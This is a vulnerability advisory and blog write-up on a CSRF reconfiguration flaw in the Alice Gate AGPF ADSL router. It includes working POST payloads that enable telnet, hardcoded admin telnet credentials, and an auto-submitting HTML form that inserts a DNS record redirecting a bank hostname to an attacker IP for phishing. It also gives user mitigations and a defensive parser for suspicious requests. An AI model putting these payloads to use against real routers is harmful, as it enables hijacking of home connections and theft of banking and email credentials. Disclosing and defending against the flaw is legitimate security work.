Alice Telecom Italia AGPF ADSL Router CSRF Reconfiguration Vulnerability

################# Alice Telecom Italia AGPF ADSL router CSRF reconfiguration #################

## ABSTRACT

A huge number of Italian ADSL broadband users are vulnerable to
connection wiretapping and phishing. The most widely distributed
Italian ADSL router, Alice Gate 2 Plus VoIP Wi-Fi (AGPF), produced by
Pirelli, is vulnerable to a CSRF attack that allows an attacker to modify
the internal router configuration: DNS servers, traffic routing, VoIP
configuration, DHCP parameters and other settings, which may
lead to a complete takeover of the user's ADSL connection. The same
technique can also enable hidden features and the
telnet/ftp/tftp/web extended admin interface.

## VENDOR: Alice Telecom Italia Modem/Routers manufactured by Pirelli
## MODEL: AGPF [Alice Gate VoIP 2 Plus Wi-Fi] version < 2.6.0
## PLATFORM: Customized Linux with openrg middleware on Broadcom BCM96348 chipset.
## VULNERABILITY: CSRF and configuration injection via HTTP POST parameter
## EMAIL: emilio.pinn gmail
## AUTHOR: Emilio Pinna
## RISK: high
 
Alice Gate AGPF: CSRF reconfiguration vulnerability details
9/2/2012 23:56

This post is part of a series of articles on the CSRF vulnerability in the Alice Gate VoIP 2 Plus WiFi router; read the introductory article first.

The Alice Gate VoIP 2 Plus WiFi (AGPF) router has been in circulation since 2008, and there is a vast literature on methods to unlock it (hardware jumpers, JTAG, backdoor triggers via packets on the local network) in order to replace the firmware, unlock the advanced menu or VoIP, or modify the most diverse configurations.

Of the many unlocking methods for the AGPF router, the one described here is by far the most immediate, since it can be executed with a simple POST request triggered from an HTML page, and is therefore also exploitable via a CSRF attack.
Unlocking

Warning: changes to the internal configuration of the Alice Gate VoIP 2 Plus WiFi router may be prohibited by your contract with the provider, and may damage the router to the point of making it unusable. Before making any change, make sure you know how to restore the initial settings. Run the demonstration test at your own risk.

This study of the device's security is intended for educational purposes, to explain the vulnerability and how to protect your home connection pending an update by the distributor. The author is not liable for damage to computer systems or violations arising from the use of the techniques described. Remember that unauthorized access to a computer system is punishable under article 615-ter of the Italian Penal Code.

The AGPF routers, manufactured by Pirelli Broadband Solutions and distributed by Telecom Italia under the name Alice Gate VoIP 2 Plus WiFi, run a Linux kernel with the openrg middleware, which handles every aspect of the gateway: functionality, services, user interfaces, etc. The heart of the system is the discus configuration file, derived from the openrg .conf file of vanilla openrg systems and written in a particular syntax, as you can see from some files published on the Web.

The HTTP POST request is what unlocks the hidden features of the router in the demonstrator that I posted.
Discus .conf

The discus configuration file (DHCP.conf) controls every aspect of the Linux/openrg system installed on the router, as can be seen from the main categories of configurable options:
(openrg
  (dev())
  (admin())
  (system())
  (wbm())
  (syslog())
  (dns())
  (disk())
  (fs())
  (print_server())
  (service())
  (fw())
  (rip())
  (mcast())
  (rmt_upd())
  (voip())
  (enotify())
  (email())
  (radius())
  (cwmp())
  (manufacturer())
  (cert())
  (ssh())
  (upnp())
  (pppoe_relay())
  (qos())
  (network())
  (internal())
  (modem())
  (themanager())
)
 
Individual items are accessed by specifying their path: for example, the third DNS entry, (dns (entry (3 (...)))), is referenced by the path dns/entry/3. Any change made to the configuration triggers a procedure that aligns the running system to the current configuration. For example, changing the path admin/telnets/ports to open a new port triggers the start of telnetd, the modification of firewall rules, etc.

If you know what to look for, you can find on the Internet the manuals for the discus configuration file and for the whole system: a very useful handbook describing each field of the configuration file, and a programming and usage guide.
The HTTP parameter stack_set

The web interface, reachable at the address http://192.168.1.1, exposes a few pages to configure the router and view its status. The aspects configurable via the web interface are limited to a few items such as port forwarding, dynamic DNS, QoS and little else: a small part compared to the real configuration file, the discus .conf seen above.

Some pages of the web interface call the CGI file /admin.cgi with a POST request, as in this example:
/admin.cgi?active_page=9130&page_title=Alice - Info&mimic_button_field=submit_button_avanti: avanti..&button_value=attiva&strip_page_top=0&stack_set=(stack_set
  (0
    (path(fw/rule/loc_srv))
    (index(-1))
    (set
      (-1
        (services
          (0
            (name(de))
            (trigger
              (0
                (protocol(6))
                (dst
                  (start(90))
                  (end(90))
                )
              )
              (1
                (protocol(17))
                (dst
                  (start(90))
                  (end(90))
                )
              )
            )
          )
        )
        (enabled(1))
      )
    )
  )
)
 
 
 
The POST parameter stack_set contains entire portions of the configuration, which are written to the discus file DHCP.conf. Once the syntax is understood, you can try editing a path other than the one in the original request. For example, change the path admin/telnets/disabled from 1 to 0 to enable the telnet service:
/admin.cgi?active_page=9130&page_title=Alice - Info&mimic_button_field=submit_button_avanti: avanti..&button_value=attiva&strip_page_top=0&stack_set=(set
  (0
    (path(admin/telnets/disabled))
        (set(disabled(0)))
  )
)
 
 
And the telnet port is open. Connect to port 23 of 192.168.1.1 with the telnet command, using admin as username and riattizzati as password. With the help command you can list the available commands, and with system shell you spawn a BusyBox shell on the installed Linux. I suggest you open the main administration interfaces, such as telnet and the Advanced Administration menu, to manage the other configurations comfortably without having to craft a POST request each time.
CSRF

The reconfiguration technique described above, a simple POST request, lends itself perfectly to a CSRF attack that forces the victim's browser to make a request which takes control of the router. The conditions necessary for the attack are enabled by default:

No authentication is required to access the web interface
No anti-CSRF token is used

It is therefore enough to forge a web page and have the victim visit it to carry out any of the attacks described in the introductory article: intercepting connections and stealing the credentials of email, social sites, home banking, etc. It is one of the easiest attacks to carry out: since the hosts on the internal network use the router itself as their DNS server, it is enough to add an entry to divert connections to a cloned site, or to a reverse proxy, which collects the credentials of vulnerable users.

Let's see how to build an HTML page which, when displayed by a vulnerable user, configures the Alice Gate VoIP 2 Plus WiFi router to redirect all subsequent connections to www.mybank.com to disse.cting.org, this blog.
(stack_set
  (0
    (path(dns/entry))
    (index(-1))
    (set
      (-1
        (ip(109.168.126.241))
        (hostname(www.mybank.com))
      )
    )
  )
)
 
 
Once you are sure the POST request is correct (be careful: a wrong request may corrupt the configuration file and make the modem unusable), prepare the form for the automatic execution of the CSRF:
<FORM action="http://192.168.1.1/admin.cgi" method="post">
<INPUT type=HIDDEN name="active_page" value="9130">
<INPUT type=HIDDEN name="page_title" value="Alice - Info">
<INPUT type=HIDDEN name="mimic_button_field" value="submit_button_avanti: avanti..">
<INPUT type=HIDDEN name="button_value" value="attiva">
<INPUT type=HIDDEN name="strip_page_top" value="0">
<INPUT type=HIDDEN name="stack_set" value="(stack_set
  (0
    (path(dns/entry))
    (index(-1))
    (set
      (-1
        (ip(109.168.126.241))
        (hostname(www.mybank.com))
      )
    )
  )
)
">
</FORM>
<SCRIPT>
window.onload = function(){ document.forms[0].submit(); }
</SCRIPT>
 
 
A browser that opens this page automatically submits the form, adding the malicious record under the dns path of the discus .conf, with obvious possibilities of phishing and stealing www.mybank.com credentials. The other attacks described in the introductory article are equally simple to perform, and many are implemented in the demonstrator page.
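From the defender's side, the stack_set requests shown above (the telnet unlock and the DNS entry) share one S-expression syntax, so a home-network proxy or IDS can parse captured POST bodies to /admin.cgi and report which configuration paths a request would rewrite. The following Python is an added example, not code from the advisory or the demonstrator; the sensitive-prefix list and the sample body are assumptions modelled on the requests above, and parse_qs also decodes percent-encoded bodies as a browser would really send them.

```python
from urllib.parse import parse_qs

# Assumption for this example: the stock web UI only writes firewall, dynamic
# DNS and QoS paths, so writes under these prefixes are treated as suspicious.
SENSITIVE_PREFIXES = ("dns/", "admin/", "voip/", "network/", "system/")

def parse_sexpr(text):
    """Parse the openrg '(name child ...)' syntax into nested lists of strings."""
    tokens = text.replace("(", " ( ").replace(")", " ) ").split()
    pos = 0

    def read():
        nonlocal pos
        tok = tokens[pos]
        pos += 1
        if tok != "(":
            return tok                      # atom: a key, a path or a value
        node = []
        while tokens[pos] != ")":
            node.append(read())
        pos += 1                            # consume the closing ')'
        return node

    tree = read()
    if pos != len(tokens):
        raise ValueError("trailing data after S-expression")
    return tree

def config_paths(node, found=None):
    """Collect every (path(<value>)) leaf in the tree, in document order."""
    found = [] if found is None else found
    if isinstance(node, list):
        if len(node) == 2 and node[0] == "path" and isinstance(node[1], list) and node[1]:
            found.append(node[1][0])
        else:
            for child in node:
                config_paths(child, found)
    return found

def audit_post_body(body):
    """Return [(path, is_sensitive), ...] for every stack_set value in a POST body."""
    result = []
    for raw in parse_qs(body, keep_blank_values=True).get("stack_set", []):
        for path in config_paths(parse_sexpr(raw)):
            result.append((path, path.startswith(SENSITIVE_PREFIXES)))
    return result

# Constructed sample body, modelled on the DNS-redirection request above;
# the documentation address 203.0.113.10 stands in for the attacker's server.
SAMPLE_BODY = ("active_page=9130&button_value=attiva&stack_set=(stack_set (0 (path(dns/entry))"
               " (index(-1)) (set (-1 (ip(203.0.113.10)) (hostname(www.mybank.com))))))")
```

A legitimate port-forwarding request (path fw/rule/loc_srv) passes through unflagged, while the DNS and telnet rewrites are reported.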
Mitigation

I contacted Telecom Italia a month ago, offering the technical analysis of the vulnerability and the demonstrator to facilitate the study. Let's see how the official fixes should solve the problem and what we can do to mitigate the vulnerability while waiting for the software update:

Sanitize the user input sent through the HTTP POST variable, instead of rewriting the configuration file directly from the HTTP request
Implement an anti-CSRF token for every form
Enable web interface authentication by default

The first two points cannot be applied by the user, because the vulnerable CGI is compiled into the binary that handles the web interface. The third fix does not resolve the situation but limits the cases in which the CSRF attack can succeed. To enable login to the control panel you must:

Point your browser to the router's web interface
Open the Access menu item on the right
Enable user authentication by selecting the enable option and entering the password in the field below

From now on you will be asked for the password at each access, so you are vulnerable to CSRF only while logged into the web interface. Make sure not to browse other web pages while you have an active session on your router's control panel, and log out at the end of your operations, to avoid any possible CSRF attack.
 
 

More details are published in Dissecting blog:

Introduction: http://disse.cting.org/2012/09/02/alice-gate-agpf-csrf-reconf-vulnerability/
Technical details: http://disse.cting.org/2012/09/02/alice-gate-agpf-csrf-reconf-vulnerability-details/
POC: http://disse.cting.org/codes/alice.html
 
 
 
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information